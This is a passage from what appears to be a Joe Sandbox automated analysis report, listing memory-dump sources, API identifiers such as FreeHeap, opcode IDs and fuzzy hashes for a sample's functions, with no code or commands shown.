                                            • Associated: 00000000.00000002.1732294941.00007FF654586000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF65465E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732387290.00007FF654689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732425934.00007FF65468F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff654390000_c9toH15OT0.jbxd
                                            Similarity
                                            • API ID: FreeHeap
                                            • String ID:
                                            • API String ID: 3298025750-0
                                            • Opcode ID: 86303d946d595ddc3af8173b47d1c16405f6980b084b3a9c8c1bc0c27abde617
                                            • Instruction ID: b5d56c1712023e0784928491e8507f74c09ce05e0e8a8f84038591fbaf48a5c6
                                            • Opcode Fuzzy Hash: 86303d946d595ddc3af8173b47d1c16405f6980b084b3a9c8c1bc0c27abde617
                                            • Instruction Fuzzy Hash: 0661612290CAC281E771D726D4A43FA6BA0EB84B98F4C40B6D68DA77F6CF6CD544C740
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1732124557.00007FF654391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF654390000, based on PE: true
                                            • Associated: 00000000.00000002.1732109371.00007FF654390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732276448.00007FF654585000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF654586000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF65465E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732387290.00007FF654689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732425934.00007FF65468F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff654390000_c9toH15OT0.jbxd
                                            Similarity
                                            • API ID: FreeHeap
                                            • String ID:
                                            • API String ID: 3298025750-0
                                            • Opcode ID: bb3117efe324705a58d78c8ad69d28af57727d4a794689ce6926ae5e5bdeb736
                                            • Instruction ID: 1b9a9ae544e3341daad7f2725279aa004b4edb5c426b098418dce22283b63560
                                            • Opcode Fuzzy Hash: bb3117efe324705a58d78c8ad69d28af57727d4a794689ce6926ae5e5bdeb736
                                            • Instruction Fuzzy Hash: 8461402290CA8281E771D716D4A43FA6BA0EB85B98F4C40B6DA8DA77F6CF7CD544C740
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1732124557.00007FF654391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF654390000, based on PE: true
                                            • Associated: 00000000.00000002.1732109371.00007FF654390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732276448.00007FF654585000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF654586000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF65465E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732387290.00007FF654689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732425934.00007FF65468F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff654390000_c9toH15OT0.jbxd
                                            Similarity
                                            • API ID: FreeHeap
                                            • String ID:
                                            • API String ID: 3298025750-0
                                            • Opcode ID: 2d70b2f1f3b21aeed345c452193137e2d46acdf5806aba9baa8d8b32acaca3ba
                                            • Instruction ID: 4bdd7a85d034484b0b14cf3d7d9009fa1d1641d983c7e12266c175843bd1df6d
                                            • Opcode Fuzzy Hash: 2d70b2f1f3b21aeed345c452193137e2d46acdf5806aba9baa8d8b32acaca3ba
                                            • Instruction Fuzzy Hash: DD61602290CAC281E771D726D4A43FA6BA0EB85B98F4C40B6D68DA77F6CF6CD544C740
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1732124557.00007FF654391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF654390000, based on PE: true
                                            • Associated: 00000000.00000002.1732109371.00007FF654390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732276448.00007FF654585000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF654586000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF65465E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732387290.00007FF654689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732425934.00007FF65468F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff654390000_c9toH15OT0.jbxd
                                            Similarity
                                            • API ID: FreeHeap
                                            • String ID:
                                            • API String ID: 3298025750-0
                                            • Opcode ID: 1166104c0fc94708fecb172991bc9137d365110a4091f0591f81077afa6de081
                                            • Instruction ID: e6a13c556d87b62ec3a5daa87306765e94a9e225a3a99666bc40ccb012ae136a
                                            • Opcode Fuzzy Hash: 1166104c0fc94708fecb172991bc9137d365110a4091f0591f81077afa6de081
                                            • Instruction Fuzzy Hash: 59614F2290CAC280E771D726D4A43FA6BA0EB85B98F4C40B6D68DA77F6CF6CD544C740
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1732124557.00007FF654391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF654390000, based on PE: true
                                            • Associated: 00000000.00000002.1732109371.00007FF654390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732276448.00007FF654585000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF654586000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF65465E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732387290.00007FF654689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732425934.00007FF65468F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff654390000_c9toH15OT0.jbxd
                                            Similarity
                                            • API ID: FreeHeap
                                            • String ID:
                                            • API String ID: 3298025750-0
                                            • Opcode ID: 8ca3adf8d93b079895297df9f331ce839d29775258801f518810b3377bba4304
                                            • Instruction ID: 1260f4378ac0169c71bd0fc7e5002d8b536cbbaef500c7143b3685190e033322
                                            • Opcode Fuzzy Hash: 8ca3adf8d93b079895297df9f331ce839d29775258801f518810b3377bba4304
                                            • Instruction Fuzzy Hash: A3613F2290CAC280E771D716D4A43FA6BA0EB85B58F4C40B6D68D977F6CF6CD544C740
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1732124557.00007FF654391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF654390000, based on PE: true
                                            • Associated: 00000000.00000002.1732109371.00007FF654390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732276448.00007FF654585000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF654586000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF65465E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732387290.00007FF654689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732425934.00007FF65468F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff654390000_c9toH15OT0.jbxd
                                            Similarity
                                            • API ID: FreeHeap
                                            • String ID:
                                            • API String ID: 3298025750-0
                                            • Opcode ID: 3d7a5dea2f9c689d5501d2693c1bf7e1971dfde882d33d97a169780d9de2071d
                                            • Instruction ID: 0adce68f3d35e5e27d4c8df3eb586d6bc25024ef99e9d25fe51617a91ad4d88e
                                            • Opcode Fuzzy Hash: 3d7a5dea2f9c689d5501d2693c1bf7e1971dfde882d33d97a169780d9de2071d
                                            • Instruction Fuzzy Hash: 51616F2290CAC281E771D726D4A43FA6BA0EB84B98F4C40B6D68DA77F6CF6CD544C740
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1732124557.00007FF654391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF654390000, based on PE: true
                                            • Associated: 00000000.00000002.1732109371.00007FF654390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732276448.00007FF654585000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF654586000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF65465E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732387290.00007FF654689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732425934.00007FF65468F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff654390000_c9toH15OT0.jbxd
                                            Similarity
                                            • API ID: memcpy$abort$CaptureContextUnwind
                                            • String ID: assertion failed: prev.ref_count() >= 1$connection closed
                                            • API String ID: 1331445628-4068603165
                                            • Opcode ID: 92a4e5cf1fb8f4bbb7e55f98f64b8e6334d017857a14e3b63505ff43198f6936
                                            • Instruction ID: 731c4c7985e6d84c02892cd1edbbc5d24e1ddfb5bd02ccfa673c6790cf7564c8
                                            • Opcode Fuzzy Hash: 92a4e5cf1fb8f4bbb7e55f98f64b8e6334d017857a14e3b63505ff43198f6936
                                            • Instruction Fuzzy Hash: D7512722A0CA8281EA219F12E4943FD5360FB95794F5C4271DA9DA67F6CF3EE585C700
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1732124557.00007FF654391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF654390000, based on PE: true
                                            • Associated: 00000000.00000002.1732109371.00007FF654390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732276448.00007FF654585000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF654586000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF65465E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732387290.00007FF654689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732425934.00007FF65468F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff654390000_c9toH15OT0.jbxd
                                            Similarity
                                            • API ID: FreeHeap
                                            • String ID:
                                            • API String ID: 3298025750-0
                                            • Opcode ID: c4061ca4cfcb7e56eb53b649da1f01f045b4769d54678b015dc3f42ad3214cb9
                                            • Instruction ID: 3236703349776bd730475ae92f46a7de3224ca1391e91e4fa4807d1af7bd788b
                                            • Opcode Fuzzy Hash: c4061ca4cfcb7e56eb53b649da1f01f045b4769d54678b015dc3f42ad3214cb9
                                            • Instruction Fuzzy Hash: C361522290CA8280E771D716D4A43FA6BA0EB85B98F4C40B6D68DA77F6CF7CD544C741
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1732124557.00007FF654391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF654390000, based on PE: true
                                            • Associated: 00000000.00000002.1732109371.00007FF654390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732276448.00007FF654585000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF654586000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF65465E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732387290.00007FF654689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732425934.00007FF65468F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff654390000_c9toH15OT0.jbxd
                                            Similarity
                                            • API ID: FreeHeap
                                            • String ID:
                                            • API String ID: 3298025750-0
                                            • Opcode ID: a8aa2c29a919003b9bed360ea405e5ec415411fcd69dc171e9f5e10c8b564ec5
                                            • Instruction ID: 794467bf727a0438bd14b94fea92a74765f93dfd5d60183a1a79b2147ace5916
                                            • Opcode Fuzzy Hash: a8aa2c29a919003b9bed360ea405e5ec415411fcd69dc171e9f5e10c8b564ec5
                                            • Instruction Fuzzy Hash: 6F51302290CA8680E771D726D4A43FA6BA0EB85B58F4C40B6D68DA77F6CF6CD584C740
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1732124557.00007FF654391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF654390000, based on PE: true
                                            • Associated: 00000000.00000002.1732109371.00007FF654390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732276448.00007FF654585000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF654586000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF65465E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732387290.00007FF654689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732425934.00007FF65468F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff654390000_c9toH15OT0.jbxd
                                            Similarity
                                            • API ID: FreeHeap
                                            • String ID:
                                            • API String ID: 3298025750-0
                                            • Opcode ID: 29805894633fcbe4ecb332373fcb3f997f1616679613ffd909060c1626f368d1
                                            • Instruction ID: 3682ef2a2b25fee6a398dc6314f1fd5bb260bac9a5fbe7e59347618cfff50a42
                                            • Opcode Fuzzy Hash: 29805894633fcbe4ecb332373fcb3f997f1616679613ffd909060c1626f368d1
                                            • Instruction Fuzzy Hash: A951422290CA8280E771D726D4A43FA6BA0EB85B98F4C40B6D68D977F6CF7CD584C741
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1732124557.00007FF654391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF654390000, based on PE: true
                                            • Associated: 00000000.00000002.1732109371.00007FF654390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732276448.00007FF654585000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF654586000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF65465E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732387290.00007FF654689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732425934.00007FF65468F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff654390000_c9toH15OT0.jbxd
                                            Similarity
                                            • API ID: FreeHeap
                                            • String ID:
                                            • API String ID: 3298025750-0
                                            • Opcode ID: c07cfd1190693eda545a8fcc0d2f3b0458f1283811b67ecb1960423df53993cc
                                            • Instruction ID: e06a0a62f7b328c3ef238d751a0994c7fe44d6e67a17e7b6d97ddb1337119ade
                                            • Opcode Fuzzy Hash: c07cfd1190693eda545a8fcc0d2f3b0458f1283811b67ecb1960423df53993cc
                                            • Instruction Fuzzy Hash: 2251402290CA8280E771D726D4A43FA6BA0EB85B58F4C40B6DA8D977F6CF7CD584C741
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1732124557.00007FF654391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF654390000, based on PE: true
                                            • Associated: 00000000.00000002.1732109371.00007FF654390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732276448.00007FF654585000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF654586000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF65465E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732387290.00007FF654689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732425934.00007FF65468F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff654390000_c9toH15OT0.jbxd
                                            Similarity
                                            • API ID: FreeHeap
                                            • String ID:
                                            • API String ID: 3298025750-0
                                            • Opcode ID: 9180cc2a56af7bf4e7ebf233cd0febef439032fc89df5f275e02a85cd00ddd92
                                            • Instruction ID: 39d13dab097a7ea4c1971a0f82e6e23fcd38f5eb9f4f783e324602a7a3fd42db
                                            • Opcode Fuzzy Hash: 9180cc2a56af7bf4e7ebf233cd0febef439032fc89df5f275e02a85cd00ddd92
                                            • Instruction Fuzzy Hash: CA51512290CA8680E771D726D0A43FA6BA0EB85B58F4C40B6D68DA77F6CF7CD584C740
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1732124557.00007FF654391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF654390000, based on PE: true
                                            • Associated: 00000000.00000002.1732109371.00007FF654390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732276448.00007FF654585000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF654586000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF65465E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732387290.00007FF654689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732425934.00007FF65468F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff654390000_c9toH15OT0.jbxd
                                            Similarity
                                            • API ID: FreeHeap
                                            • String ID:
                                            • API String ID: 3298025750-0
                                            • Opcode ID: fbd30b175cd533cc3711b1c5d519a3542ddd5af857e7a4475864087407f0c155
                                            • Instruction ID: 0b2b2f5d2d82ccceeb177ca85f571669a3addfabc7a39d31d7e6a4c821511cd0
                                            • Opcode Fuzzy Hash: fbd30b175cd533cc3711b1c5d519a3542ddd5af857e7a4475864087407f0c155
                                            • Instruction Fuzzy Hash: A451522290CA8280E771D726D0A43FA6BA0EB85B58F4C40B6D68D977F6CF7CD584C740
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1732124557.00007FF654391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF654390000, based on PE: true
                                            • Associated: 00000000.00000002.1732109371.00007FF654390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732276448.00007FF654585000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF654586000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF65465E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732387290.00007FF654689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732425934.00007FF65468F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff654390000_c9toH15OT0.jbxd
                                            Similarity
                                            • API ID: FreeHeap
                                            • String ID:
                                            • API String ID: 3298025750-0
                                            • Opcode ID: 2975d9107f67d17f8d64b2d7ac4bb384c29f8faa8c393d167b20e012b4767fa4
                                            • Instruction ID: 39d13dab097a7ea4c1971a0f82e6e23fcd38f5eb9f4f783e324602a7a3fd42db
                                            • Opcode Fuzzy Hash: 2975d9107f67d17f8d64b2d7ac4bb384c29f8faa8c393d167b20e012b4767fa4
                                            • Instruction Fuzzy Hash: CA51512290CA8680E771D726D0A43FA6BA0EB85B58F4C40B6D68DA77F6CF7CD584C740
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1732124557.00007FF654391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF654390000, based on PE: true
                                            • Associated: 00000000.00000002.1732109371.00007FF654390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732276448.00007FF654585000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF654586000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF65465E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732387290.00007FF654689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732425934.00007FF65468F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff654390000_c9toH15OT0.jbxd
                                            Similarity
                                            • API ID: FreeHeap
                                            • String ID:
                                            • API String ID: 3298025750-0
                                            • Opcode ID: dfbc674dd6781a5bb22e01e2438d3c988be0c7d2c4efc528e7574b1d65fc6b44
                                            • Instruction ID: dc1856cf1862e87a74929cb5b344f802bc6630b51703f9f8c750bb5406848c09
                                            • Opcode Fuzzy Hash: dfbc674dd6781a5bb22e01e2438d3c988be0c7d2c4efc528e7574b1d65fc6b44
                                            • Instruction Fuzzy Hash: B1414022A09A4281F629DF22D4E43FD6390EF45B84F4D44B6CB5EA76A1DF7DE485D300
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1732124557.00007FF654391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF654390000, based on PE: true
                                            • Associated: 00000000.00000002.1732109371.00007FF654390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732276448.00007FF654585000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF654586000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF65465E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732387290.00007FF654689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732425934.00007FF65468F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff654390000_c9toH15OT0.jbxd
                                            Similarity
                                            • API ID: FreeHeap
                                            • String ID:
                                            • API String ID: 3298025750-0
                                            • Opcode ID: a127be290048e75319164969e65edf76ad37ed1f98f0271aa86e1e06a409d006
                                            • Instruction ID: 395b88ea4f3d9f8a3732adc1fe989fea3f85a1af14e7a0b395e4e8f9e211f3da
                                            • Opcode Fuzzy Hash: a127be290048e75319164969e65edf76ad37ed1f98f0271aa86e1e06a409d006
                                            • Instruction Fuzzy Hash: 60416012E1C98281FA28CF17D4E43B97390EF85B84F5D44B6CA5DE66A1DF7DF4859200
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1732124557.00007FF654391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF654390000, based on PE: true
                                            • Associated: 00000000.00000002.1732109371.00007FF654390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732276448.00007FF654585000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF654586000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732294941.00007FF65465E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732387290.00007FF654689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732400609.00007FF65468E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1732425934.00007FF65468F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff654390000_c9toH15OT0.jbxd
                                            Similarity
                                            • API ID: FreeHeap
                                            • String ID:
                                            • API String ID: 3298025750-0
                                            • Opcode ID: 4b29cb0d857da003e61fe5368989c8248ec1a5677e28c54e955eebc2ac320d3e
                                            • Instruction ID: 422235499f25506408fdb7cba82cca2d59d6aebc185c63743125b041382d3fa3
                                            • Opcode Fuzzy Hash: 4b29cb0d857da003e61fe5368989c8248ec1a5677e28c54e955eebc2ac320d3e
                                            • Instruction Fuzzy Hash: 13513F2290CAC280E771D726D4A43FA6BA0EB85B48F4C40B6D68DA77F6CF6CD584C740
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1732124557.00007FF654391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF654390000, based on PE: true
                                            • Associated: 00000000.00000002.1732109371.00007FF654390000.00000002.00000001.01000000.00000003.sdmpDownload File
